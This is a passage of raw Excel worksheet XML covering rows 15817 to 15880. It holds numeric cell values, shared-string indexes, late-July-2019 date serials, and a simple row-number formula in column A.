      </c>
      <c r="B15817">
        <v>816</v>
      </c>
      <c r="C15817" t="s">
        <v>25497</v>
      </c>
      <c r="D15817" s="1">
        <v>43669</v>
      </c>
      <c r="E15817" t="s">
        <v>25592</v>
      </c>
      <c r="F15817" t="s">
        <v>9975</v>
      </c>
      <c r="G15817" t="s">
        <v>26579</v>
      </c>
    </row>
    <row r="15818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15818">
        <f t="shared" si="247"/>
        <v>15817</v>
      </c>
      <c r="B15818">
        <v>817</v>
      </c>
      <c r="C15818" t="s">
        <v>25497</v>
      </c>
      <c r="D15818" s="1">
        <v>43676</v>
      </c>
      <c r="E15818" t="s">
        <v>25805</v>
      </c>
      <c r="F15818" t="s">
        <v>9975</v>
      </c>
      <c r="G15818" t="s">
        <v>26580</v>
      </c>
    </row>
    <row r="15819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15819">
        <f t="shared" si="247"/>
        <v>15818</v>
      </c>
      <c r="B15819">
        <v>818</v>
      </c>
      <c r="C15819" t="s">
        <v>25497</v>
      </c>
      <c r="D15819" s="1">
        <v>43668</v>
      </c>
      <c r="E15819" t="s">
        <v>26458</v>
      </c>
      <c r="F15819" t="s">
        <v>10021</v>
      </c>
      <c r="G15819" t="s">
        <v>26581</v>
      </c>
    </row>
    <row r="15820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15820">
        <f t="shared" si="247"/>
        <v>15819</v>
      </c>
      <c r="B15820">
        <v>819</v>
      </c>
      <c r="C15820" t="s">
        <v>25497</v>
      </c>
      <c r="D15820" s="1">
        <v>43675</v>
      </c>
      <c r="E15820" t="s">
        <v>25509</v>
      </c>
      <c r="F15820" t="s">
        <v>10021</v>
      </c>
      <c r="G15820" t="s">
        <v>26582</v>
      </c>
    </row>
    <row r="15821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15821">
        <f t="shared" si="247"/>
        <v>15820</v>
      </c>
      <c r="B15821">
        <v>820</v>
      </c>
      <c r="C15821" t="s">
        <v>25497</v>
      </c>
      <c r="D15821" s="1">
        <v>43676</v>
      </c>
      <c r="F15821" t="s">
        <v>9975</v>
      </c>
      <c r="G15821" t="s">
        <v>26583</v>
      </c>
    </row>
    <row r="15822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15822">
        <f t="shared" si="247"/>
        <v>15821</v>
      </c>
      <c r="B15822">
        <v>821</v>
      </c>
      <c r="C15822" t="s">
        <v>25497</v>
      </c>
      <c r="D15822" s="1">
        <v>43676</v>
      </c>
      <c r="E15822" t="s">
        <v>26584</v>
      </c>
      <c r="F15822" t="s">
        <v>9975</v>
      </c>
      <c r="G15822" t="s">
        <v>26585</v>
      </c>
    </row>
    <row r="15823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15823">
        <f t="shared" si="247"/>
        <v>15822</v>
      </c>
      <c r="B15823">
        <v>822</v>
      </c>
      <c r="C15823" t="s">
        <v>25497</v>
      </c>
      <c r="D15823" s="1">
        <v>43668</v>
      </c>
      <c r="E15823" t="s">
        <v>25609</v>
      </c>
      <c r="F15823" t="s">
        <v>9975</v>
      </c>
      <c r="G15823" t="s">
        <v>26586</v>
      </c>
    </row>
    <row r="15824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15824">
        <f t="shared" si="247"/>
        <v>15823</v>
      </c>
      <c r="B15824">
        <v>823</v>
      </c>
      <c r="C15824" t="s">
        <v>25497</v>
      </c>
      <c r="D15824" s="1">
        <v>43668</v>
      </c>
      <c r="F15824" t="s">
        <v>10021</v>
      </c>
      <c r="G15824" t="s">
        <v>26587</v>
      </c>
    </row>
    <row r="15825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15825">
        <f t="shared" si="247"/>
        <v>15824</v>
      </c>
      <c r="B15825">
        <v>824</v>
      </c>
      <c r="C15825" t="s">
        <v>25497</v>
      </c>
      <c r="D15825" s="1">
        <v>43674</v>
      </c>
      <c r="E15825" t="s">
        <v>25774</v>
      </c>
      <c r="F15825" t="s">
        <v>9975</v>
      </c>
      <c r="G15825" t="s">
        <v>26588</v>
      </c>
    </row>
    <row r="15826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15826">
        <f t="shared" si="247"/>
        <v>15825</v>
      </c>
      <c r="B15826">
        <v>825</v>
      </c>
      <c r="C15826" t="s">
        <v>25497</v>
      </c>
      <c r="D15826" s="1">
        <v>43672</v>
      </c>
      <c r="F15826" t="s">
        <v>9975</v>
      </c>
      <c r="G15826" t="s">
        <v>26589</v>
      </c>
    </row>
    <row r="15827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15827">
        <f t="shared" si="247"/>
        <v>15826</v>
      </c>
      <c r="B15827">
        <v>826</v>
      </c>
      <c r="C15827" t="s">
        <v>25497</v>
      </c>
      <c r="D15827" s="1">
        <v>43671</v>
      </c>
      <c r="E15827" t="s">
        <v>26590</v>
      </c>
      <c r="F15827" t="s">
        <v>9975</v>
      </c>
      <c r="G15827" t="s">
        <v>26591</v>
      </c>
    </row>
    <row r="15828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15828">
        <f t="shared" si="247"/>
        <v>15827</v>
      </c>
      <c r="B15828">
        <v>827</v>
      </c>
      <c r="C15828" t="s">
        <v>25497</v>
      </c>
      <c r="D15828" s="1">
        <v>43668</v>
      </c>
      <c r="E15828" t="s">
        <v>25517</v>
      </c>
      <c r="F15828" t="s">
        <v>9975</v>
      </c>
      <c r="G15828" t="s">
        <v>26592</v>
      </c>
    </row>
    <row r="15829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15829">
        <f t="shared" si="247"/>
        <v>15828</v>
      </c>
      <c r="B15829">
        <v>828</v>
      </c>
      <c r="C15829" t="s">
        <v>25497</v>
      </c>
      <c r="D15829" s="1">
        <v>43670</v>
      </c>
      <c r="F15829" t="s">
        <v>9975</v>
      </c>
      <c r="G15829" t="s">
        <v>26593</v>
      </c>
    </row>
    <row r="15830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15830">
        <f t="shared" si="247"/>
        <v>15829</v>
      </c>
      <c r="B15830">
        <v>829</v>
      </c>
      <c r="C15830" t="s">
        <v>25497</v>
      </c>
      <c r="D15830" s="1">
        <v>43669</v>
      </c>
      <c r="E15830" t="s">
        <v>25509</v>
      </c>
      <c r="F15830" t="s">
        <v>10021</v>
      </c>
      <c r="G15830" t="s">
        <v>26594</v>
      </c>
    </row>
    <row r="15831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15831">
        <f t="shared" si="247"/>
        <v>15830</v>
      </c>
      <c r="B15831">
        <v>830</v>
      </c>
      <c r="C15831" t="s">
        <v>25497</v>
      </c>
      <c r="D15831" s="1">
        <v>43671</v>
      </c>
      <c r="F15831" t="s">
        <v>9975</v>
      </c>
      <c r="G15831" t="s">
        <v>26595</v>
      </c>
    </row>
    <row r="15832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15832">
        <f t="shared" si="247"/>
        <v>15831</v>
      </c>
      <c r="B15832">
        <v>831</v>
      </c>
      <c r="C15832" t="s">
        <v>25497</v>
      </c>
      <c r="D15832" s="1">
        <v>43669</v>
      </c>
      <c r="E15832" t="s">
        <v>19705</v>
      </c>
      <c r="F15832" t="s">
        <v>9975</v>
      </c>
      <c r="G15832" t="s">
        <v>26596</v>
      </c>
    </row>
    <row r="15833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15833">
        <f t="shared" si="247"/>
        <v>15832</v>
      </c>
      <c r="B15833">
        <v>832</v>
      </c>
      <c r="C15833" t="s">
        <v>25497</v>
      </c>
      <c r="D15833" s="1">
        <v>43675</v>
      </c>
      <c r="F15833" t="s">
        <v>9975</v>
      </c>
      <c r="G15833" t="s">
        <v>26597</v>
      </c>
    </row>
    <row r="15834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15834">
        <f t="shared" si="247"/>
        <v>15833</v>
      </c>
      <c r="B15834">
        <v>833</v>
      </c>
      <c r="C15834" t="s">
        <v>25497</v>
      </c>
      <c r="D15834" s="1">
        <v>43673</v>
      </c>
      <c r="E15834" t="s">
        <v>26598</v>
      </c>
      <c r="F15834" t="s">
        <v>9975</v>
      </c>
      <c r="G15834" t="s">
        <v>26599</v>
      </c>
    </row>
    <row r="15835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15835">
        <f t="shared" si="247"/>
        <v>15834</v>
      </c>
      <c r="B15835">
        <v>834</v>
      </c>
      <c r="C15835" t="s">
        <v>25497</v>
      </c>
      <c r="D15835" s="1">
        <v>43672</v>
      </c>
      <c r="E15835" t="s">
        <v>26600</v>
      </c>
      <c r="F15835" t="s">
        <v>9975</v>
      </c>
      <c r="G15835" t="s">
        <v>26601</v>
      </c>
    </row>
    <row r="15836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15836">
        <f t="shared" si="247"/>
        <v>15835</v>
      </c>
      <c r="B15836">
        <v>835</v>
      </c>
      <c r="C15836" t="s">
        <v>25497</v>
      </c>
      <c r="D15836" s="1">
        <v>43675</v>
      </c>
      <c r="F15836" t="s">
        <v>9975</v>
      </c>
      <c r="G15836" t="s">
        <v>26602</v>
      </c>
    </row>
    <row r="15837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15837">
        <f t="shared" si="247"/>
        <v>15836</v>
      </c>
      <c r="B15837">
        <v>836</v>
      </c>
      <c r="C15837" t="s">
        <v>25497</v>
      </c>
      <c r="D15837" s="1">
        <v>43675</v>
      </c>
      <c r="E15837" t="s">
        <v>22148</v>
      </c>
      <c r="F15837" t="s">
        <v>10526</v>
      </c>
      <c r="G15837" t="s">
        <v>26603</v>
      </c>
    </row>
    <row r="15838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15838">
        <f t="shared" si="247"/>
        <v>15837</v>
      </c>
      <c r="B15838">
        <v>837</v>
      </c>
      <c r="C15838" t="s">
        <v>25497</v>
      </c>
      <c r="D15838" s="1">
        <v>43672</v>
      </c>
      <c r="F15838" t="s">
        <v>9975</v>
      </c>
      <c r="G15838" t="s">
        <v>26604</v>
      </c>
    </row>
    <row r="15839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15839">
        <f t="shared" si="247"/>
        <v>15838</v>
      </c>
      <c r="B15839">
        <v>838</v>
      </c>
      <c r="C15839" t="s">
        <v>25497</v>
      </c>
      <c r="D15839" s="1">
        <v>43672</v>
      </c>
      <c r="F15839" t="s">
        <v>9975</v>
      </c>
      <c r="G15839" t="s">
        <v>26605</v>
      </c>
    </row>
    <row r="15840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15840">
        <f t="shared" si="247"/>
        <v>15839</v>
      </c>
      <c r="B15840">
        <v>839</v>
      </c>
      <c r="C15840" t="s">
        <v>25497</v>
      </c>
      <c r="D15840" s="1">
        <v>43672</v>
      </c>
      <c r="E15840" t="s">
        <v>25886</v>
      </c>
      <c r="F15840" t="s">
        <v>9975</v>
      </c>
      <c r="G15840" t="s">
        <v>26606</v>
      </c>
    </row>
    <row r="15841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15841">
        <f t="shared" si="247"/>
        <v>15840</v>
      </c>
      <c r="B15841">
        <v>840</v>
      </c>
      <c r="C15841" t="s">
        <v>25497</v>
      </c>
      <c r="D15841" s="1">
        <v>43671</v>
      </c>
      <c r="E15841" t="s">
        <v>26607</v>
      </c>
      <c r="F15841" t="s">
        <v>9975</v>
      </c>
      <c r="G15841" t="s">
        <v>26608</v>
      </c>
    </row>
    <row r="15842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15842">
        <f t="shared" si="247"/>
        <v>15841</v>
      </c>
      <c r="B15842">
        <v>841</v>
      </c>
      <c r="C15842" t="s">
        <v>25497</v>
      </c>
      <c r="D15842" s="1">
        <v>43677</v>
      </c>
      <c r="E15842" t="s">
        <v>26609</v>
      </c>
      <c r="F15842" t="s">
        <v>10526</v>
      </c>
      <c r="G15842" t="s">
        <v>26610</v>
      </c>
    </row>
    <row r="15843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15843">
        <f t="shared" si="247"/>
        <v>15842</v>
      </c>
      <c r="B15843">
        <v>842</v>
      </c>
      <c r="C15843" t="s">
        <v>25497</v>
      </c>
      <c r="D15843" s="1">
        <v>43673</v>
      </c>
      <c r="F15843" t="s">
        <v>9975</v>
      </c>
      <c r="G15843" t="s">
        <v>26611</v>
      </c>
    </row>
    <row r="15844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15844">
        <f t="shared" si="247"/>
        <v>15843</v>
      </c>
      <c r="B15844">
        <v>843</v>
      </c>
      <c r="C15844" t="s">
        <v>25497</v>
      </c>
      <c r="D15844" s="1">
        <v>43675</v>
      </c>
      <c r="E15844" t="s">
        <v>26612</v>
      </c>
      <c r="F15844" t="s">
        <v>9975</v>
      </c>
      <c r="G15844" t="s">
        <v>26613</v>
      </c>
    </row>
    <row r="15845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15845">
        <f t="shared" si="247"/>
        <v>15844</v>
      </c>
      <c r="B15845">
        <v>844</v>
      </c>
      <c r="C15845" t="s">
        <v>25497</v>
      </c>
      <c r="D15845" s="1">
        <v>43675</v>
      </c>
      <c r="E15845" t="s">
        <v>26614</v>
      </c>
      <c r="F15845" t="s">
        <v>9975</v>
      </c>
      <c r="G15845" t="s">
        <v>26615</v>
      </c>
    </row>
    <row r="15846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15846">
        <f t="shared" si="247"/>
        <v>15845</v>
      </c>
      <c r="B15846">
        <v>845</v>
      </c>
      <c r="C15846" t="s">
        <v>25497</v>
      </c>
      <c r="D15846" s="1">
        <v>43673</v>
      </c>
      <c r="F15846" t="s">
        <v>9975</v>
      </c>
      <c r="G15846" t="s">
        <v>26616</v>
      </c>
    </row>
    <row r="15847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15847">
        <f t="shared" si="247"/>
        <v>15846</v>
      </c>
      <c r="B15847">
        <v>846</v>
      </c>
      <c r="C15847" t="s">
        <v>25497</v>
      </c>
      <c r="D15847" s="1">
        <v>43670</v>
      </c>
      <c r="E15847" t="s">
        <v>25509</v>
      </c>
      <c r="F15847" t="s">
        <v>9975</v>
      </c>
      <c r="G15847" t="s">
        <v>26617</v>
      </c>
    </row>
    <row r="15848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15848">
        <f t="shared" si="247"/>
        <v>15847</v>
      </c>
      <c r="B15848">
        <v>847</v>
      </c>
      <c r="C15848" t="s">
        <v>25497</v>
      </c>
      <c r="D15848" s="1">
        <v>43676</v>
      </c>
      <c r="F15848" t="s">
        <v>9975</v>
      </c>
      <c r="G15848" t="s">
        <v>26618</v>
      </c>
    </row>
    <row r="15849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15849">
        <f t="shared" si="247"/>
        <v>15848</v>
      </c>
      <c r="B15849">
        <v>848</v>
      </c>
      <c r="C15849" t="s">
        <v>25497</v>
      </c>
      <c r="D15849" s="1">
        <v>43671</v>
      </c>
      <c r="F15849" t="s">
        <v>9975</v>
      </c>
      <c r="G15849" t="s">
        <v>26619</v>
      </c>
    </row>
    <row r="15850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15850">
        <f t="shared" si="247"/>
        <v>15849</v>
      </c>
      <c r="B15850">
        <v>849</v>
      </c>
      <c r="C15850" t="s">
        <v>25497</v>
      </c>
      <c r="D15850" s="1">
        <v>43670</v>
      </c>
      <c r="E15850" t="s">
        <v>25517</v>
      </c>
      <c r="F15850" t="s">
        <v>9975</v>
      </c>
      <c r="G15850" t="s">
        <v>26620</v>
      </c>
    </row>
    <row r="15851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15851">
        <f t="shared" si="247"/>
        <v>15850</v>
      </c>
      <c r="B15851">
        <v>850</v>
      </c>
      <c r="C15851" t="s">
        <v>25497</v>
      </c>
      <c r="D15851" s="1">
        <v>43670</v>
      </c>
      <c r="E15851" t="s">
        <v>26621</v>
      </c>
      <c r="F15851" t="s">
        <v>9975</v>
      </c>
      <c r="G15851" t="s">
        <v>26622</v>
      </c>
    </row>
    <row r="15852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15852">
        <f t="shared" si="247"/>
        <v>15851</v>
      </c>
      <c r="B15852">
        <v>851</v>
      </c>
      <c r="C15852" t="s">
        <v>25497</v>
      </c>
      <c r="D15852" s="1">
        <v>43670</v>
      </c>
      <c r="E15852" t="s">
        <v>26623</v>
      </c>
      <c r="F15852" t="s">
        <v>9975</v>
      </c>
      <c r="G15852" t="s">
        <v>26624</v>
      </c>
    </row>
    <row r="15853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15853">
        <f t="shared" si="247"/>
        <v>15852</v>
      </c>
      <c r="B15853">
        <v>852</v>
      </c>
      <c r="C15853" t="s">
        <v>25497</v>
      </c>
      <c r="D15853" s="1">
        <v>43670</v>
      </c>
      <c r="E15853" t="s">
        <v>19705</v>
      </c>
      <c r="F15853" t="s">
        <v>9975</v>
      </c>
      <c r="G15853" t="s">
        <v>26625</v>
      </c>
    </row>
    <row r="15854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15854">
        <f t="shared" si="247"/>
        <v>15853</v>
      </c>
      <c r="B15854">
        <v>853</v>
      </c>
      <c r="C15854" t="s">
        <v>25497</v>
      </c>
      <c r="D15854" s="1">
        <v>43677</v>
      </c>
      <c r="E15854" t="s">
        <v>26293</v>
      </c>
      <c r="F15854" t="s">
        <v>9975</v>
      </c>
      <c r="G15854" t="s">
        <v>26626</v>
      </c>
    </row>
    <row r="15855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15855">
        <f t="shared" si="247"/>
        <v>15854</v>
      </c>
      <c r="B15855">
        <v>854</v>
      </c>
      <c r="C15855" t="s">
        <v>25497</v>
      </c>
      <c r="D15855" s="1">
        <v>43671</v>
      </c>
      <c r="F15855" t="s">
        <v>9975</v>
      </c>
      <c r="G15855" t="s">
        <v>26627</v>
      </c>
    </row>
    <row r="15856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15856">
        <f t="shared" si="247"/>
        <v>15855</v>
      </c>
      <c r="B15856">
        <v>855</v>
      </c>
      <c r="C15856" t="s">
        <v>25497</v>
      </c>
      <c r="D15856" s="1">
        <v>43669</v>
      </c>
      <c r="E15856" t="s">
        <v>26628</v>
      </c>
      <c r="F15856" t="s">
        <v>9975</v>
      </c>
      <c r="G15856" t="s">
        <v>26629</v>
      </c>
    </row>
    <row r="15857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15857">
        <f t="shared" si="247"/>
        <v>15856</v>
      </c>
      <c r="B15857">
        <v>856</v>
      </c>
      <c r="C15857" t="s">
        <v>25497</v>
      </c>
      <c r="D15857" s="1">
        <v>43676</v>
      </c>
      <c r="E15857" t="s">
        <v>25592</v>
      </c>
      <c r="F15857" t="s">
        <v>9975</v>
      </c>
      <c r="G15857" t="s">
        <v>26630</v>
      </c>
    </row>
    <row r="15858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15858">
        <f t="shared" si="247"/>
        <v>15857</v>
      </c>
      <c r="B15858">
        <v>857</v>
      </c>
      <c r="C15858" t="s">
        <v>25497</v>
      </c>
      <c r="D15858" s="1">
        <v>43668</v>
      </c>
      <c r="E15858" t="s">
        <v>26631</v>
      </c>
      <c r="F15858" t="s">
        <v>10021</v>
      </c>
      <c r="G15858" t="s">
        <v>26632</v>
      </c>
    </row>
    <row r="15859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15859">
        <f t="shared" si="247"/>
        <v>15858</v>
      </c>
      <c r="B15859">
        <v>858</v>
      </c>
      <c r="C15859" t="s">
        <v>25497</v>
      </c>
      <c r="D15859" s="1">
        <v>43675</v>
      </c>
      <c r="E15859" t="s">
        <v>26633</v>
      </c>
      <c r="F15859" t="s">
        <v>9975</v>
      </c>
      <c r="G15859" t="s">
        <v>26634</v>
      </c>
    </row>
    <row r="15860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15860">
        <f t="shared" si="247"/>
        <v>15859</v>
      </c>
      <c r="B15860">
        <v>859</v>
      </c>
      <c r="C15860" t="s">
        <v>25497</v>
      </c>
      <c r="D15860" s="1">
        <v>43670</v>
      </c>
      <c r="E15860" t="s">
        <v>25584</v>
      </c>
      <c r="F15860" t="s">
        <v>9975</v>
      </c>
      <c r="G15860" t="s">
        <v>26635</v>
      </c>
    </row>
    <row r="15861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15861">
        <f t="shared" si="247"/>
        <v>15860</v>
      </c>
      <c r="B15861">
        <v>860</v>
      </c>
      <c r="C15861" t="s">
        <v>25497</v>
      </c>
      <c r="D15861" s="1">
        <v>43676</v>
      </c>
      <c r="E15861" t="s">
        <v>26636</v>
      </c>
      <c r="F15861" t="s">
        <v>9975</v>
      </c>
      <c r="G15861" t="s">
        <v>26637</v>
      </c>
    </row>
    <row r="15862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15862">
        <f t="shared" si="247"/>
        <v>15861</v>
      </c>
      <c r="B15862">
        <v>861</v>
      </c>
      <c r="C15862" t="s">
        <v>25497</v>
      </c>
      <c r="D15862" s="1">
        <v>43672</v>
      </c>
      <c r="F15862" t="s">
        <v>9975</v>
      </c>
      <c r="G15862" t="s">
        <v>26638</v>
      </c>
    </row>
    <row r="15863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15863">
        <f t="shared" si="247"/>
        <v>15862</v>
      </c>
      <c r="B15863">
        <v>862</v>
      </c>
      <c r="C15863" t="s">
        <v>25497</v>
      </c>
      <c r="D15863" s="1">
        <v>43668</v>
      </c>
      <c r="E15863" t="s">
        <v>26458</v>
      </c>
      <c r="F15863" t="s">
        <v>10021</v>
      </c>
      <c r="G15863" t="s">
        <v>26639</v>
      </c>
    </row>
    <row r="15864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15864">
        <f t="shared" si="247"/>
        <v>15863</v>
      </c>
      <c r="B15864">
        <v>863</v>
      </c>
      <c r="C15864" t="s">
        <v>25497</v>
      </c>
      <c r="D15864" s="1">
        <v>43671</v>
      </c>
      <c r="E15864" t="s">
        <v>25517</v>
      </c>
      <c r="F15864" t="s">
        <v>9975</v>
      </c>
      <c r="G15864" t="s">
        <v>26640</v>
      </c>
    </row>
    <row r="15865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15865">
        <f t="shared" si="247"/>
        <v>15864</v>
      </c>
      <c r="B15865">
        <v>864</v>
      </c>
      <c r="C15865" t="s">
        <v>25497</v>
      </c>
      <c r="D15865" s="1">
        <v>43676</v>
      </c>
      <c r="F15865" t="s">
        <v>9975</v>
      </c>
      <c r="G15865" t="s">
        <v>26641</v>
      </c>
    </row>
    <row r="15866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15866">
        <f t="shared" si="247"/>
        <v>15865</v>
      </c>
      <c r="B15866">
        <v>865</v>
      </c>
      <c r="C15866" t="s">
        <v>25497</v>
      </c>
      <c r="D15866" s="1">
        <v>43668</v>
      </c>
      <c r="E15866" t="s">
        <v>26642</v>
      </c>
      <c r="F15866" t="s">
        <v>9975</v>
      </c>
      <c r="G15866" t="s">
        <v>26643</v>
      </c>
    </row>
    <row r="15867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15867">
        <f t="shared" si="247"/>
        <v>15866</v>
      </c>
      <c r="B15867">
        <v>866</v>
      </c>
      <c r="C15867" t="s">
        <v>25497</v>
      </c>
      <c r="D15867" s="1">
        <v>43668</v>
      </c>
      <c r="E15867" t="s">
        <v>25517</v>
      </c>
      <c r="F15867" t="s">
        <v>9975</v>
      </c>
      <c r="G15867" t="s">
        <v>26644</v>
      </c>
    </row>
    <row r="15868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15868">
        <f t="shared" si="247"/>
        <v>15867</v>
      </c>
      <c r="B15868">
        <v>867</v>
      </c>
      <c r="C15868" t="s">
        <v>25497</v>
      </c>
      <c r="D15868" s="1">
        <v>43668</v>
      </c>
      <c r="E15868" t="s">
        <v>26645</v>
      </c>
      <c r="F15868" t="s">
        <v>9975</v>
      </c>
      <c r="G15868" t="s">
        <v>26646</v>
      </c>
    </row>
    <row r="15869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15869">
        <f t="shared" si="247"/>
        <v>15868</v>
      </c>
      <c r="B15869">
        <v>868</v>
      </c>
      <c r="C15869" t="s">
        <v>25497</v>
      </c>
      <c r="D15869" s="1">
        <v>43676</v>
      </c>
      <c r="E15869" t="s">
        <v>26647</v>
      </c>
      <c r="F15869" t="s">
        <v>9975</v>
      </c>
      <c r="G15869" t="s">
        <v>26648</v>
      </c>
    </row>
    <row r="15870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15870">
        <f t="shared" si="247"/>
        <v>15869</v>
      </c>
      <c r="B15870">
        <v>869</v>
      </c>
      <c r="C15870" t="s">
        <v>25497</v>
      </c>
      <c r="D15870" s="1">
        <v>43671</v>
      </c>
      <c r="F15870" t="s">
        <v>10021</v>
      </c>
      <c r="G15870" t="s">
        <v>26649</v>
      </c>
    </row>
    <row r="15871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15871">
        <f t="shared" si="247"/>
        <v>15870</v>
      </c>
      <c r="B15871">
        <v>870</v>
      </c>
      <c r="C15871" t="s">
        <v>25497</v>
      </c>
      <c r="D15871" s="1">
        <v>43677</v>
      </c>
      <c r="E15871" t="s">
        <v>25517</v>
      </c>
      <c r="F15871" t="s">
        <v>9975</v>
      </c>
      <c r="G15871" t="s">
        <v>26650</v>
      </c>
    </row>
    <row r="15872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15872">
        <f t="shared" si="247"/>
        <v>15871</v>
      </c>
      <c r="B15872">
        <v>871</v>
      </c>
      <c r="C15872" t="s">
        <v>25497</v>
      </c>
      <c r="D15872" s="1">
        <v>43674</v>
      </c>
      <c r="E15872" t="s">
        <v>26651</v>
      </c>
      <c r="F15872" t="s">
        <v>9975</v>
      </c>
      <c r="G15872" t="s">
        <v>26652</v>
      </c>
    </row>
    <row r="15873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15873">
        <f t="shared" si="247"/>
        <v>15872</v>
      </c>
      <c r="B15873">
        <v>872</v>
      </c>
      <c r="C15873" t="s">
        <v>25497</v>
      </c>
      <c r="D15873" s="1">
        <v>43669</v>
      </c>
      <c r="F15873" t="s">
        <v>9975</v>
      </c>
      <c r="G15873" t="s">
        <v>26653</v>
      </c>
    </row>
    <row r="15874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15874">
        <f t="shared" si="247"/>
        <v>15873</v>
      </c>
      <c r="B15874">
        <v>873</v>
      </c>
      <c r="C15874" t="s">
        <v>25497</v>
      </c>
      <c r="D15874" s="1">
        <v>43672</v>
      </c>
      <c r="E15874" t="s">
        <v>25707</v>
      </c>
      <c r="F15874" t="s">
        <v>9978</v>
      </c>
      <c r="G15874" t="s">
        <v>26654</v>
      </c>
    </row>
    <row r="15875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15875">
        <f t="shared" ref="A15875:A15938" si="248">+ROW(A15874)</f>
        <v>15874</v>
      </c>
      <c r="B15875">
        <v>874</v>
      </c>
      <c r="C15875" t="s">
        <v>25497</v>
      </c>
      <c r="D15875" s="1">
        <v>43672</v>
      </c>
      <c r="E15875" t="s">
        <v>25517</v>
      </c>
      <c r="F15875" t="s">
        <v>9975</v>
      </c>
      <c r="G15875" t="s">
        <v>26655</v>
      </c>
    </row>
    <row r="15876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15876">
        <f t="shared" si="248"/>
        <v>15875</v>
      </c>
      <c r="B15876">
        <v>875</v>
      </c>
      <c r="C15876" t="s">
        <v>25497</v>
      </c>
      <c r="D15876" s="1">
        <v>43669</v>
      </c>
      <c r="F15876" t="s">
        <v>9975</v>
      </c>
      <c r="G15876" t="s">
        <v>26656</v>
      </c>
    </row>
    <row r="15877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15877">
        <f t="shared" si="248"/>
        <v>15876</v>
      </c>
      <c r="B15877">
        <v>876</v>
      </c>
      <c r="C15877" t="s">
        <v>25497</v>
      </c>
      <c r="D15877" s="1">
        <v>43676</v>
      </c>
      <c r="E15877" t="s">
        <v>25517</v>
      </c>
      <c r="F15877" t="s">
        <v>9975</v>
      </c>
      <c r="G15877" t="s">
        <v>26657</v>
      </c>
    </row>
    <row r="15878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15878">
        <f t="shared" si="248"/>
        <v>15877</v>
      </c>
      <c r="B15878">
        <v>877</v>
      </c>
      <c r="C15878" t="s">
        <v>25497</v>
      </c>
      <c r="D15878" s="1">
        <v>43672</v>
      </c>
      <c r="E15878" t="s">
        <v>25512</v>
      </c>
      <c r="F15878" t="s">
        <v>9975</v>
      </c>
      <c r="G15878" t="s">
        <v>26658</v>
      </c>
    </row>
    <row r="15879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15879">
        <f t="shared" si="248"/>
        <v>15878</v>
      </c>
      <c r="B15879">
        <v>878</v>
      </c>
      <c r="C15879" t="s">
        <v>25497</v>
      </c>
      <c r="D15879" s="1">
        <v>43672</v>
      </c>
      <c r="E15879" t="s">
        <v>25512</v>
      </c>
      <c r="F15879" t="s">
        <v>9975</v>
      </c>
      <c r="G15879" t="s">
        <v>26659</v>
      </c>
    </row>
    <row r="15880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15880">
        <f t="shared" si="248"/>
        <v>15879</v>
      </c>
      <c r="B15880">
        <v>879</v>
      </c>
      <c r="C15880" t="s">
        <v>25497</v>
      </c>
      <c r="D15880" s="1">
        <v>43676</v>
      </c>
